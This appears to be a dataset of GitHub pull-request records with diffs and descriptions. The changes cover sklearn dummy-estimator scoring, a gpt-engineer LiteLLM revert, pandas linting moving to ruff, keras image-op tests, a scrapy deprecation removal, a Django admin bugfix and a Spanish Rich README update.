- [ ] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [ ] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [ ] Improvement
- [x] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
Closes https://github.com/yt-dlp/yt-dlp/issues/1287
| https://api.github.com/repos/yt-dlp/yt-dlp/pulls/1308 | 2021-10-16T15:50:56Z | 2021-10-18T02:39:50Z | 2021-10-18T02:39:50Z | 2021-10-21T16:36:29Z | 823 | yt-dlp/yt-dlp | 7,365 |
[MRG] Allow scoring of dummies without testsamples | diff --git a/doc/whats_new/v0.20.rst b/doc/whats_new/v0.20.rst
index 2ed336b782174..3866f5c611499 100644
--- a/doc/whats_new/v0.20.rst
+++ b/doc/whats_new/v0.20.rst
@@ -291,6 +291,10 @@ Support for Python 3.3 has been officially dropped.
only require X to be an object with finite length or shape. :issue:`9832` by
:user:`Vrishank Bhardwaj <vrishank97>`.
+- |Feature| :class:`dummy.DummyClassifier` and :class:`dummy.DummyRegressor`
+ can now be scored without supplying test samples.
+ :issue:`11951` by :user:`Rüdiger Busche <JarnoRFB>`.
+
:mod:`sklearn.ensemble`
.......................
diff --git a/sklearn/dummy.py b/sklearn/dummy.py
index f2c866413183b..de183893f1edb 100644
--- a/sklearn/dummy.py
+++ b/sklearn/dummy.py
@@ -318,6 +318,37 @@ def predict_log_proba(self, X):
else:
return [np.log(p) for p in proba]
+ def score(self, X, y, sample_weight=None):
+ """Returns the mean accuracy on the given test data and labels.
+
+ In multi-label classification, this is the subset accuracy
+ which is a harsh metric since you require for each sample that
+ each label set be correctly predicted.
+
+ Parameters
+ ----------
+ X : {array-like, None}
+ Test samples with shape = (n_samples, n_features) or
+ None. Passing None as test samples gives the same result
+ as passing real test samples, since DummyClassifier
+ operates independently of the sampled observations.
+
+ y : array-like, shape = (n_samples) or (n_samples, n_outputs)
+ True labels for X.
+
+ sample_weight : array-like, shape = [n_samples], optional
+ Sample weights.
+
+ Returns
+ -------
+ score : float
+ Mean accuracy of self.predict(X) wrt. y.
+
+ """
+ if X is None:
+ X = np.zeros(shape=(len(y), 1))
+ return super(DummyClassifier, self).score(X, y, sample_weight)
+
class DummyRegressor(BaseEstimator, RegressorMixin):
"""
@@ -478,3 +509,41 @@ def predict(self, X, return_std=False):
y_std = np.ravel(y_std)
return (y, y_std) if return_std else y
+
+ def score(self, X, y, sample_weight=None):
+ """Returns the coefficient of determination R^2 of the prediction.
+
+ The coefficient R^2 is defined as (1 - u/v), where u is the residual
+ sum of squares ((y_true - y_pred) ** 2).sum() and v is the total
+ sum of squares ((y_true - y_true.mean()) ** 2).sum().
+ The best possible score is 1.0 and it can be negative (because the
+ model can be arbitrarily worse). A constant model that always
+ predicts the expected value of y, disregarding the input features,
+ would get a R^2 score of 0.0.
+
+ Parameters
+ ----------
+ X : {array-like, None}
+ Test samples with shape = (n_samples, n_features) or None.
+ For some estimators this may be a
+ precomputed kernel matrix instead, shape = (n_samples,
+ n_samples_fitted], where n_samples_fitted is the number of
+ samples used in the fitting for the estimator.
+ Passing None as test samples gives the same result
+ as passing real test samples, since DummyRegressor
+ operates independently of the sampled observations.
+
+ y : array-like, shape = (n_samples) or (n_samples, n_outputs)
+ True values for X.
+
+ sample_weight : array-like, shape = [n_samples], optional
+ Sample weights.
+
+ Returns
+ -------
+ score : float
+ R^2 of self.predict(X) wrt. y.
+ """
+ if X is None:
+ X = np.zeros(shape=(len(y), 1))
+ return super(DummyRegressor, self).score(X, y, sample_weight)
diff --git a/sklearn/tests/test_dummy.py b/sklearn/tests/test_dummy.py
index 5d955f51017a1..805c90a7e018e 100644
--- a/sklearn/tests/test_dummy.py
+++ b/sklearn/tests/test_dummy.py
@@ -1,5 +1,7 @@
from __future__ import division
+import pytest
+
import numpy as np
import scipy.sparse as sp
@@ -200,6 +202,45 @@ def test_string_labels():
assert_array_equal(clf.predict(X), ["paris"] * 5)
+@pytest.mark.parametrize("y,y_test", [
+ ([2, 1, 1, 1], [2, 2, 1, 1]),
+ (np.array([[2, 2],
+ [1, 1],
+ [1, 1],
+ [1, 1]]),
+ np.array([[2, 2],
+ [2, 2],
+ [1, 1],
+ [1, 1]]))
+])
+def test_classifier_score_with_None(y, y_test):
+ clf = DummyClassifier(strategy="most_frequent")
+ clf.fit(None, y)
+ assert_equal(clf.score(None, y_test), 0.5)
+
+
+@pytest.mark.parametrize("strategy", [
+ "stratified",
+ "most_frequent",
+ "prior",
+ "uniform",
+ "constant"
+])
+def test_classifier_prediction_independent_of_X(strategy):
+ y = [0, 2, 1, 1]
+ X1 = [[0]] * 4
+ clf1 = DummyClassifier(strategy=strategy, random_state=0, constant=0)
+ clf1.fit(X1, y)
+ predictions1 = clf1.predict(X1)
+
+ X2 = [[1]] * 4
+ clf2 = DummyClassifier(strategy=strategy, random_state=0, constant=0)
+ clf2.fit(X2, y)
+ predictions2 = clf2.predict(X2)
+
+ assert_array_equal(predictions1, predictions2)
+
+
def test_classifier_exceptions():
clf = DummyClassifier(strategy="unknown")
assert_raises(ValueError, clf.fit, [], [])
@@ -633,3 +674,39 @@ def test_dummy_regressor_return_std():
assert_equal(len(y_pred_list), 2)
# the second element should be all zeros
assert_array_equal(y_pred_list[1], y_std_expected)
+
+
+@pytest.mark.parametrize("y,y_test", [
+ ([1, 1, 1, 2], [1.25] * 4),
+ (np.array([[2, 2],
+ [1, 1],
+ [1, 1],
+ [1, 1]]),
+ [[1.25, 1.25]] * 4)
+
+])
+def test_regressor_score_with_None(y, y_test):
+ reg = DummyRegressor()
+ reg.fit(None, y)
+ assert_equal(reg.score(None, y_test), 1.0)
+
+
+@pytest.mark.parametrize("strategy", [
+ "mean",
+ "median",
+ "quantile",
+ "constant"
+])
+def test_regressor_prediction_independent_of_X(strategy):
+ y = [0, 2, 1, 1]
+ X1 = [[0]] * 4
+ reg1 = DummyRegressor(strategy=strategy, constant=0, quantile=0.7)
+ reg1.fit(X1, y)
+ predictions1 = reg1.predict(X1)
+
+ X2 = [[1]] * 4
+ reg2 = DummyRegressor(strategy=strategy, constant=0, quantile=0.7)
+ reg2.fit(X2, y)
+ predictions2 = reg2.predict(X2)
+
+ assert_array_equal(predictions1, predictions2)
| As DummyClassifier and DummyRegressor operate solely on the targets,
they can now be used without passing test samples, instead passing None.
Also includes some minor renaming in the corresponding tests for more
consistency.
<!--
Thanks for contributing a pull request! Please ensure you have taken a look at
the contribution guidelines: https://github.com/scikit-learn/scikit-learn/blob/master/CONTRIBUTING.md#pull-request-checklist
-->
#### Reference Issues/PRs
Resolves #11951
<!--
Example: Fixes #1234. See also #3456.
Please use keywords (e.g., Fixes) to create link to the issues or pull requests
you resolved, so that they will automatically be closed when your pull request
is merged. See https://github.com/blog/1506-closing-issues-via-pull-requests
-->
<!--
Please be aware that we are a loose team of volunteers so patience is
necessary; assistance handling other issues is very welcome. We value
all user contributions, no matter how minor they are. If we are slow to
review, either the pull request needs some benchmarking, tinkering,
convincing, etc. or more likely the reviewers are simply busy. In either
case, we ask for your understanding during the review process.
For more information, see our FAQ on this topic:
http://scikit-learn.org/dev/faq.html#why-is-my-pull-request-not-getting-any-attention.
Thanks for contributing!
-->
| https://api.github.com/repos/scikit-learn/scikit-learn/pulls/11957 | 2018-08-31T13:45:19Z | 2018-09-13T08:04:00Z | 2018-09-13T08:04:00Z | 2018-09-13T08:44:30Z | 1,897 | scikit-learn/scikit-learn | 46,712 |
Revert "add support for anthropic, azure, aleph alpha, ai21, togetherai, cohere, replicate, huggingface inference endpoints, etc. " | diff --git a/.env.template b/.env.template
index 61e0b462e8..8315b6151a 100644
--- a/.env.template
+++ b/.env.template
@@ -2,15 +2,3 @@
# OPENAI_API_KEY=Your personal OpenAI API key from https://platform.openai.com/account/api-keys
OPENAI_API_KEY=$key
-
-# LiteLLM support models: Huggingface, Cohere, Replicate, Aleph Alpha, TogetherAI and more - https://docs.litellm.ai/docs/completion/supported
-AI21_API_KEY=""
-ANTHROPIC_API_KEY=""
-TOGETHERAI_API_KEY=""
-ALEPH_ALPHA_API_KEY=""
-HUGGINGFACE_API_KEY=""
-COHERE_API_KEY=""
-REPLICATE_API_KEY=""
-AZURE_API_BASE = ""
-AZURE_API_KEY = ""
-AZURE_API_VERSION = ""
\ No newline at end of file
diff --git a/gpt_engineer/ai.py b/gpt_engineer/ai.py
index 940d57eb35..db58d943f4 100644
--- a/gpt_engineer/ai.py
+++ b/gpt_engineer/ai.py
@@ -2,8 +2,7 @@
import json
import logging
-import os
-import litellm
+
from dataclasses import dataclass
from typing import List, Optional, Union
@@ -11,7 +10,7 @@
import tiktoken
from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler
-from langchain.chat_models import AzureChatOpenAI, ChatOpenAI, ChatLiteLLM
+from langchain.chat_models import AzureChatOpenAI, ChatOpenAI
from langchain.chat_models.base import BaseChatModel
from langchain.schema import (
AIMessage,
@@ -356,7 +355,6 @@ def create_chat_model(self, model: str, temperature) -> BaseChatModel:
BaseChatModel
The created chat model.
"""
- model = "j2-mid"
if self.azure_endpoint:
return AzureChatOpenAI(
openai_api_base=self.azure_endpoint,
@@ -365,12 +363,6 @@ def create_chat_model(self, model: str, temperature) -> BaseChatModel:
openai_api_type="azure",
streaming=True,
)
- elif model in litellm.model_list or model.split("/", 1)[0] in litellm.provider_list:
- return ChatLiteLLM(
- model=model,
- temperature=temperature,
- streaming=True,
- )
# Fetch available models from OpenAI API
supported = [model["id"] for model in openai.Model.list()["data"]]
if model not in supported:
diff --git a/pyproject.toml b/pyproject.toml
index 89ebd11774..fbafd9bc9a 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -22,7 +22,6 @@ dependencies = [
'tiktoken >=0.0.4',
'tabulate == 0.9.0',
'python-dotenv >= 0.21.0',
- 'litellm == 0.1.518',
'langchain >=0.0.240',
]
| Reverts AntonOsika/gpt-engineer#660 | https://api.github.com/repos/gpt-engineer-org/gpt-engineer/pulls/685 | 2023-09-07T20:05:19Z | 2023-09-07T20:05:25Z | 2023-09-07T20:05:25Z | 2023-09-07T20:05:29Z | 712 | gpt-engineer-org/gpt-engineer | 33,160 |
CI: replace flake8-pyi with ruff | diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 02acba4804eb3..d4baa638bdda2 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -28,7 +28,7 @@ repos:
types_or: [python, pyi]
additional_dependencies: [black==23.1.0]
- repo: https://github.com/charliermarsh/ruff-pre-commit
- rev: v0.0.255
+ rev: v0.0.259
hooks:
- id: ruff
args: [--exit-non-zero-on-fix]
@@ -392,14 +392,6 @@ repos:
files: ^pandas/
exclude: ^(pandas/_libs/|pandas/tests/|pandas/errors/__init__.py$|pandas/_version.py)
types: [python]
- - id: flake8-pyi
- name: flake8-pyi
- entry: flake8 --extend-ignore=E301,E302,E305,E701,E704
- types: [pyi]
- language: python
- additional_dependencies:
- - flake8==5.0.4
- - flake8-pyi==22.8.1
- id: future-annotations
name: import annotations from __future__
entry: 'from __future__ import annotations'
diff --git a/pyproject.toml b/pyproject.toml
index da831dc9f8bd4..2aadfd7bd41ef 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -215,6 +215,8 @@ select = [
"PLE", "PLR", "PLW",
# misc lints
"PIE",
+ # flake8-pyi
+ "PYI",
# tidy imports
"TID",
# implicit string concatenation
@@ -266,6 +268,14 @@ ignore = [
"PLR0915",
# Global statements are discouraged
"PLW0603",
+ # Docstrings should not be included in stubs
+ "PYI021",
+ # Use typing_extensions.TypeAlias for type aliases
+ # "PYI026", # not yet implemented
+ # Use "collections.abc.*" instead of "typing.*" (PEP 585 syntax)
+ # "PYI027", # not yet implemented
+ # while int | float can be shortened to float, the former is more explicit
+ # "PYI041", # not yet implemented
# Additional checks that don't pass yet
# Within an except clause, raise exceptions with ...
@@ -281,6 +291,8 @@ exclude = [
"doc/build/*.py",
"doc/temp/*.py",
".eggs/*.py",
+ # vendored files
+ "pandas/util/version/*",
"versioneer.py",
# exclude asv benchmark environments from linting
"env",
@@ -292,8 +304,9 @@ exclude = [
# to be enabled gradually
"pandas/core/*" = ["PLR5501", "PLW2901"]
"pandas/io/*" = ["PLW2901"]
-"pandas/tests/*" = ["PLW2901"]
+"pandas/tests/*" = ["B028", "PLW2901"]
"pandas/plotting/*" = ["PLW2901"]
+"scripts/*" = ["B028"]
# Keep this one enabled
"pandas/_typing.py" = ["TCH"]
diff --git a/setup.cfg b/setup.cfg
index f27daa56cbfc6..c269237f97211 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -1,7 +1,7 @@
[flake8]
max-line-length = 88
# Although ruff is now the main linter for style checks, this section
-# is still needed for validate_docstrings.py and flake8-pyi
+# is still needed for validate_docstrings.py
ignore =
# space before : (needed for how black formats slicing)
E203,
@@ -12,17 +12,7 @@ ignore =
# module level import not at top of file
E402,
# do not assign a lambda expression, use a def
- E731,
- # found modulo formatter (incorrect picks up mod operations)
- Y002,
- # Docstrings should not be included in stubs
- Y021,
- # Use typing_extensions.TypeAlias for type aliases
- Y026,
- # Use "collections.abc.*" instead of "typing.*" (PEP 585 syntax)
- Y027,
- # while int | float can be shortened to float, the former is more explicit
- Y041
+ E731
exclude =
doc/sphinxext/*.py,
doc/build/*.py,
| Not all rules are covered by ruff but, from my point of view, the important ones are covered. | https://api.github.com/repos/pandas-dev/pandas/pulls/52226 | 2023-03-26T17:26:31Z | 2023-03-26T19:34:59Z | 2023-03-26T19:34:59Z | 2023-08-09T15:08:36Z | 1,102 | pandas-dev/pandas | 45,453 |
Fix `MapCoordinates` class and Add Tests for Uncovered Areas in `keras/ops/image.py` | diff --git a/keras/ops/image.py b/keras/ops/image.py
index 715bbe0aeaa..1edc9ea594a 100644
--- a/keras/ops/image.py
+++ b/keras/ops/image.py
@@ -515,7 +515,7 @@ def _extract_patches(
class MapCoordinates(Operation):
- def __init__(self, order, fill_mode="constant", fill_value=0):
+ def __init__(self, order=1, fill_mode="constant", fill_value=0):
super().__init__()
self.order = order
self.fill_mode = fill_mode
diff --git a/keras/ops/image_test.py b/keras/ops/image_test.py
index e16cc21351c..2f8b24a3e1e 100644
--- a/keras/ops/image_test.py
+++ b/keras/ops/image_test.py
@@ -602,3 +602,157 @@ def test_crop_images(
backend.convert_to_numpy(cropped_image),
atol=1e-5,
)
+
+ def test_rgb_to_grayscale_invalid_rank_two_tensor(self):
+ rgb_to_gray = kimage.RGBToGrayscale()
+ invalid_image = np.random.uniform(size=(10, 10))
+ with self.assertRaisesRegex(
+ ValueError,
+ "Invalid image rank: expected rank 3",
+ ):
+ rgb_to_gray.compute_output_spec(invalid_image)
+
+ def test_rgb_to_grayscale_invalid_rank_five_tensor(self):
+ rgb_to_gray = kimage.RGBToGrayscale()
+ invalid_image = np.random.uniform(size=(2, 3, 10, 10, 3))
+ with self.assertRaisesRegex(
+ ValueError,
+ "Invalid image rank: expected rank 3",
+ ):
+ rgb_to_gray.compute_output_spec(invalid_image)
+
+ def test_rgb_to_grayscale_valid_rank_three_tensor(self):
+ rgb_to_gray = kimage.RGBToGrayscale()
+ valid_image = np.random.uniform(size=(10, 10, 3))
+ output_spec = rgb_to_gray.compute_output_spec(valid_image)
+ self.assertEqual(
+ output_spec.shape,
+ (10, 10, 1),
+ "Output shape should match expected grayscale image shape",
+ )
+
+ def test_rgb_to_grayscale_valid_rank_four_tensor(self):
+ rgb_to_gray = kimage.RGBToGrayscale()
+ valid_image = np.random.uniform(size=(5, 10, 10, 3))
+ output_spec = rgb_to_gray.compute_output_spec(valid_image)
+ self.assertEqual(
+ output_spec.shape,
+ (5, 10, 10, 1),
+ "Output shape should match expected grayscale image shape",
+ )
+
+ def test_affine_transform_compute_output_spec_image_rank_too_low(self):
+ affine_transform = kimage.AffineTransform()
+ # Test with an image of rank 2 (invalid)
+ image_2d = np.random.uniform(size=(10, 10))
+ transform_valid = np.random.uniform(size=(6,))
+ with self.assertRaisesRegex(
+ ValueError, "Invalid image rank: expected rank 3"
+ ):
+ affine_transform.compute_output_spec(image_2d, transform_valid)
+
+ def test_affine_transform_compute_output_spec_image_rank_too_high(self):
+ affine_transform = kimage.AffineTransform()
+ # Test with an image of rank 5 (invalid)
+ image_5d = np.random.uniform(size=(2, 10, 10, 3, 1))
+ transform_valid = np.random.uniform(size=(6,))
+ with self.assertRaisesRegex(
+ ValueError, "Invalid image rank: expected rank 3"
+ ):
+ affine_transform.compute_output_spec(image_5d, transform_valid)
+
+ def test_affine_transform_compute_output_spec_transform_rank_too_high(self):
+ affine_transform = kimage.AffineTransform()
+ # Test with a valid image rank 3
+ image_valid = np.random.uniform(size=(10, 10, 3))
+ # Test with a transform of rank 3 (invalid)
+ transform_invalid_rank3 = np.random.uniform(size=(2, 3, 2))
+ with self.assertRaisesRegex(
+ ValueError, "Invalid transform rank: expected rank 1"
+ ):
+ affine_transform.compute_output_spec(
+ image_valid, transform_invalid_rank3
+ )
+
+ def test_affine_transform_compute_output_spec_transform_rank_too_low(self):
+ affine_transform = kimage.AffineTransform()
+ # Test with a valid image rank 3
+ image_valid = np.random.uniform(size=(10, 10, 3))
+ # Test with a transform of rank 0 (invalid)
+ transform_invalid_rank0 = np.random.uniform(size=())
+ with self.assertRaisesRegex(
+ ValueError, "Invalid transform rank: expected rank 1"
+ ):
+ affine_transform.compute_output_spec(
+ image_valid, transform_invalid_rank0
+ )
+
+ def test_extract_patches_with_invalid_tuple_size(self):
+ size = (3, 3, 3) # Invalid size, too many dimensions
+ image = np.random.uniform(size=(2, 20, 20, 3))
+ with self.assertRaisesRegex(
+ TypeError, "Expected an int or a tuple of length 2"
+ ):
+ kimage.extract_patches(image, size)
+
+ def test_extract_patches_with_incorrect_type_size(self):
+ size = "5" # Invalid size type
+ image = np.random.uniform(size=(2, 20, 20, 3))
+ with self.assertRaisesRegex(
+ TypeError, "Expected an int or a tuple of length 2"
+ ):
+ kimage.extract_patches(image, size)
+
+ def test_extract_patches_with_integer_size(self):
+ size = 5
+ # Use float32 for compatibility with TensorFlow convolution operations
+ image = np.random.uniform(size=(1, 20, 20, 3)).astype(np.float32)
+ patches = kimage.extract_patches(image, size)
+ # Expecting 4x4 patches with each patch having 75 values (5x5x3)
+ expected_shape = (1, 4, 4, 75)
+ self.assertEqual(patches.shape, expected_shape)
+
+ def test_extract_patches_with_tuple_size(self):
+ size = (5, 5)
+ image = np.random.uniform(size=(1, 20, 20, 3)).astype(np.float32)
+ patches = kimage.extract_patches(image, size)
+ # Expecting 4x4 patches with each patch having 75 values (5x5x3)
+ expected_shape = (1, 4, 4, 75)
+ self.assertEqual(patches.shape, expected_shape)
+
+ def test_map_coordinates_image_coordinates_rank_mismatch(self):
+ map_coordinates = kimage.MapCoordinates()
+ image = np.random.uniform(size=(10, 10, 3))
+ coordinates = np.random.uniform(size=(2, 10, 10))
+ with self.assertRaisesRegex(
+ ValueError, "must be the same as the rank of `image`"
+ ):
+ map_coordinates.compute_output_spec(image, coordinates)
+
+ def test_map_coordinates_image_coordinates_rank_mismatch_order_zero(self):
+ map_coordinates = kimage.MapCoordinates(order=0)
+ image = np.random.uniform(size=(10, 10, 3))
+ coordinates = np.random.uniform(size=(2, 10, 10))
+ with self.assertRaisesRegex(
+ ValueError, "must be the same as the rank of `image`"
+ ):
+ map_coordinates.compute_output_spec(image, coordinates)
+
+ def test_map_coordinates_coordinates_rank_too_low(self):
+ map_coordinates = kimage.MapCoordinates()
+ image = np.random.uniform(size=(10, 10, 3))
+ coordinates = np.random.uniform(size=(3,))
+ with self.assertRaisesRegex(ValueError, "expected at least rank 2"):
+ map_coordinates.compute_output_spec(image, coordinates)
+
+ def test_map_coordinates_valid_input(self):
+ map_coordinates = kimage.MapCoordinates()
+ image = np.random.uniform(size=(10, 10, 3))
+ coordinates = np.random.uniform(size=(3, 10, 10))
+ output_spec = map_coordinates.compute_output_spec(image, coordinates)
+ expected_shape = (10, 10)
+ self.assertEqual(
+ output_spec.shape,
+ expected_shape,
+ "Output shape should be correct for valid inputs",
+ )
| This PR addresses a
`TypeError: MapCoordinates.__init__() missing 1 required positional argument: 'order'`
in `MapCoordinates` by adding a default `order=1` in the constructor.
Also,
tests for uncovered areas in `ops/image.py` are also included for better coverage.
---
**Note:**
We default to `order=1` for linear interpolation, which is generally more commonly used in many applications and preferred choice due to its smoother results than order=0 (nearest neighbor).
---
**Changes Made:**
- Added default `order=1` to `MapCoordinates` constructor.
- Included tests for uncovered areas in `ops/image.py`.
| https://api.github.com/repos/keras-team/keras/pulls/19507 | 2024-04-14T10:45:16Z | 2024-04-14T16:49:03Z | 2024-04-14T16:49:03Z | 2024-04-14T16:49:07Z | 1,906 | keras-team/keras | 47,859 |
Remove deprecated CrawlerRunner.spiders. | diff --git a/scrapy/crawler.py b/scrapy/crawler.py
index c5b3e19036b..bc0ab02df27 100644
--- a/scrapy/crawler.py
+++ b/scrapy/crawler.py
@@ -204,16 +204,6 @@ def __init__(self, settings: Union[Dict[str, Any], Settings, None] = None):
self._active: Set[defer.Deferred] = set()
self.bootstrap_failed = False
- @property
- def spiders(self):
- warnings.warn(
- "CrawlerRunner.spiders attribute is renamed to "
- "CrawlerRunner.spider_loader.",
- category=ScrapyDeprecationWarning,
- stacklevel=2,
- )
- return self.spider_loader
-
def crawl(self, crawler_or_spidercls, *args, **kwargs):
"""
Run a crawler with the provided arguments.
diff --git a/tests/test_crawler.py b/tests/test_crawler.py
index f99606ccfcd..4c5c48e6df2 100644
--- a/tests/test_crawler.py
+++ b/tests/test_crawler.py
@@ -20,7 +20,6 @@
from scrapy.settings import Settings, default_settings
from scrapy.spiderloader import SpiderLoader
from scrapy.utils.log import configure_logging, get_scrapy_root_handler
-from scrapy.utils.misc import load_object
from scrapy.utils.spider import DefaultSpider
from scrapy.utils.test import get_crawler
from tests.mockserver import MockServer, get_mockserver_env
@@ -182,16 +181,6 @@ def test_crawler_runner_accepts_None(self):
runner = CrawlerRunner()
self.assertOptionIsDefault(runner.settings, "RETRY_ENABLED")
- def test_deprecated_attribute_spiders(self):
- with warnings.catch_warnings(record=True) as w:
- runner = CrawlerRunner(Settings())
- spiders = runner.spiders
- self.assertEqual(len(w), 1)
- self.assertIn("CrawlerRunner.spiders", str(w[0].message))
- self.assertIn("CrawlerRunner.spider_loader", str(w[0].message))
- sl_cls = load_object(runner.settings["SPIDER_LOADER_CLASS"])
- self.assertIsInstance(spiders, sl_cls)
-
class CrawlerProcessTest(BaseCrawlerTest):
def test_crawler_process_accepts_dict(self):
| It was deprecated in the same release (1.0.0) it was added. | https://api.github.com/repos/scrapy/scrapy/pulls/6010 | 2023-08-10T19:09:36Z | 2023-08-11T08:41:05Z | 2023-08-11T08:41:05Z | 2023-10-18T07:55:06Z | 518 | scrapy/scrapy | 34,329 |
Fixed #24851 -- Fixed crash with reverse one-to-one relation in ModelAdmin.list_display | diff --git a/django/contrib/admin/templatetags/admin_list.py b/django/contrib/admin/templatetags/admin_list.py
index 55fba4f90ce8b..e602133ca279c 100644
--- a/django/contrib/admin/templatetags/admin_list.py
+++ b/django/contrib/admin/templatetags/admin_list.py
@@ -200,7 +200,7 @@ def link_in_col(is_first, field_name, cl):
except ObjectDoesNotExist:
result_repr = EMPTY_CHANGELIST_VALUE
else:
- if f is None:
+ if f is None or f.auto_created:
if field_name == 'action_checkbox':
row_classes = ['action-checkbox']
allow_tags = getattr(attr, 'allow_tags', False)
diff --git a/django/contrib/admin/views/main.py b/django/contrib/admin/views/main.py
index c0e59f9a5fb2b..68c787871a6d4 100644
--- a/django/contrib/admin/views/main.py
+++ b/django/contrib/admin/views/main.py
@@ -383,7 +383,7 @@ def has_related_field_in_list_display(self):
except FieldDoesNotExist:
pass
else:
- if isinstance(field.rel, models.ManyToOneRel):
+ if hasattr(field, 'rel') and isinstance(field.rel, models.ManyToOneRel):
return True
return False
diff --git a/docs/releases/1.8.3.txt b/docs/releases/1.8.3.txt
index 3bc13a2656016..860191db1b2f3 100644
--- a/docs/releases/1.8.3.txt
+++ b/docs/releases/1.8.3.txt
@@ -28,3 +28,6 @@ Bugfixes
* Prevented the loss of ``null``/``not null`` column properties during field
renaming of MySQL databases (:ticket:`24817`).
+
+* Fixed a crash when using a reverse one-to-one relation in
+ ``ModelAdmin.list_display`` (:ticket:`24851`).
diff --git a/tests/admin_changelist/admin.py b/tests/admin_changelist/admin.py
index 926a45d518607..a31cd84c1ce8b 100644
--- a/tests/admin_changelist/admin.py
+++ b/tests/admin_changelist/admin.py
@@ -102,7 +102,7 @@ class NoListDisplayLinksParentAdmin(admin.ModelAdmin):
class SwallowAdmin(admin.ModelAdmin):
actions = None # prevent ['action_checkbox'] + list(list_display)
- list_display = ('origin', 'load', 'speed')
+ list_display = ('origin', 'load', 'speed', 'swallowonetoone')
site.register(Swallow, SwallowAdmin)
diff --git a/tests/admin_changelist/models.py b/tests/admin_changelist/models.py
index 76249b2cd39d9..c01bf32062180 100644
--- a/tests/admin_changelist/models.py
+++ b/tests/admin_changelist/models.py
@@ -78,6 +78,10 @@ class Meta:
ordering = ('speed', 'load')
+class SwallowOneToOne(models.Model):
+ swallow = models.OneToOneField(Swallow)
+
+
class UnorderedObject(models.Model):
"""
Model without any defined `Meta.ordering`.
diff --git a/tests/admin_changelist/tests.py b/tests/admin_changelist/tests.py
index c69b6712efac8..8d5b966572d85 100644
--- a/tests/admin_changelist/tests.py
+++ b/tests/admin_changelist/tests.py
@@ -25,7 +25,7 @@
from .models import (
Band, Child, ChordsBand, ChordsMusician, CustomIdUser, Event, Genre, Group,
Invitation, Membership, Musician, OrderedObject, Parent, Quartet, Swallow,
- UnorderedObject,
+ SwallowOneToOne, UnorderedObject,
)
@@ -478,8 +478,10 @@ def test_tuple_list_display(self):
Regression test for #17128
(ChangeList failing under Python 2.5 after r16319)
"""
- swallow = Swallow.objects.create(
- origin='Africa', load='12.34', speed='22.2')
+ swallow = Swallow.objects.create(origin='Africa', load='12.34', speed='22.2')
+ swallow2 = Swallow.objects.create(origin='Africa', load='12.34', speed='22.2')
+ swallow_o2o = SwallowOneToOne.objects.create(swallow=swallow2)
+
model_admin = SwallowAdmin(Swallow, admin.site)
superuser = self._create_superuser('superuser')
request = self._mocked_authenticated_request('/swallow/', superuser)
@@ -488,6 +490,9 @@ def test_tuple_list_display(self):
self.assertContains(response, six.text_type(swallow.origin))
self.assertContains(response, six.text_type(swallow.load))
self.assertContains(response, six.text_type(swallow.speed))
+ # Reverse one-to-one relations should work.
+ self.assertContains(response, '<td class="field-swallowonetoone">(None)</td>')
+ self.assertContains(response, '<td class="field-swallowonetoone">%s</td>' % swallow_o2o)
def test_deterministic_order_for_unordered_model(self):
"""
| In 1.8, `get_field()` returns reverse relations so we need to filter them out for backwards compatibility.
| https://api.github.com/repos/django/django/pulls/4717 | 2015-05-27T15:50:19Z | 2015-05-28T14:48:21Z | 2015-05-28T14:48:21Z | 2015-05-28T14:51:15Z | 1,194 | django/django | 51,424 |
Update README.es.md collapsable sections | diff --git a/README.es.md b/README.es.md
index 53faae511..a433067d5 100644
--- a/README.es.md
+++ b/README.es.md
@@ -29,6 +29,12 @@ Instale con `pip` o su administrador de paquetes PyPi favorito.
pip install rich
```
+Ejecute lo siguiente para probar la salida de Rich sobre su terminal:
+
+```
+python -m rich
+```
+
## Función print de Rich
Para agregar sin esfuerzo resultados enriquecidos a su aplicación, puede importar el método [rich print](https://rich.readthedocs.io/en/latest/introduction.html#quick-start), que tiene la misma firma que el método incorporado de Python. Prueba esto:
@@ -88,7 +94,30 @@ console.print("Where there is a [bold cyan]Will[/bold cyan] there [u]is[/u] a [i
![Console Markup](https://github.com/willmcgugan/rich/raw/master/imgs/where_there_is_a_will.png)
-### Registro de consola
+Usted puede usar el objeto Console para generar salida sofisticada con mínimo esfuerzo. Ver la [API Console](https://rich.readthedocs.io/en/latest/console.html) docs para detalles.
+
+## Rich Inspector
+
+Rich tiene ua función [inspeccionar](https://rich.readthedocs.io/en/latest/reference/init.html?highlight=inspect#rich.inspect) cual puede producir un reporte sobre cualquier objeto Python, como clases, instancia o builtin.
+
+```python
+>>> my_list = ["foo", "bar"]
+>>> from rich import inspect
+>>> inspect(my_list, methods=True)
+```
+
+![Log](https://github.com/willmcgugan/rich/raw/master/imgs/inspect.png)
+
+Ver la [docs inspector](https://rich.readthedocs.io/en/latest/reference/init.html#rich.inspect) para detalles.
+
+# Paquete Rich
+
+Rich contiene un número de builtin _renderables_ que puedes usar para crear salida elegante en su CLI y ayudarle a depurar su código.
+
+Haga clic en los siguientes títulos para obtener más detalles:
+
+<details>
+<summary>Registro de consola</summary>
El objeto Console tiene un método `log()` que tiene una interfaz similar a `print()`, pero también muestra una columna para la hora actual y el archivo y la línea que realizó la llamada. De forma predeterminada, Rich resaltará la sintaxis de las estructuras de Python y de las cadenas de reproducción. Si registra una colección (es decir, un diccionario o una lista), Rich la imprimirá de forma bonita para que quepa en el espacio disponible. A continuación, se muestra un ejemplo de algunas de estas funciones.
@@ -123,13 +152,17 @@ Tenga en cuenta el argumento `log_locals`, que genera una tabla que contiene las
El método de registro podría usarse para iniciar sesión en el terminal para aplicaciones de larga ejecución, como servidores, pero también es una ayuda de depuración muy buena.
-### Controlador de registro
+</details>
+<details>
+<summary>Controlador de registro</summary>
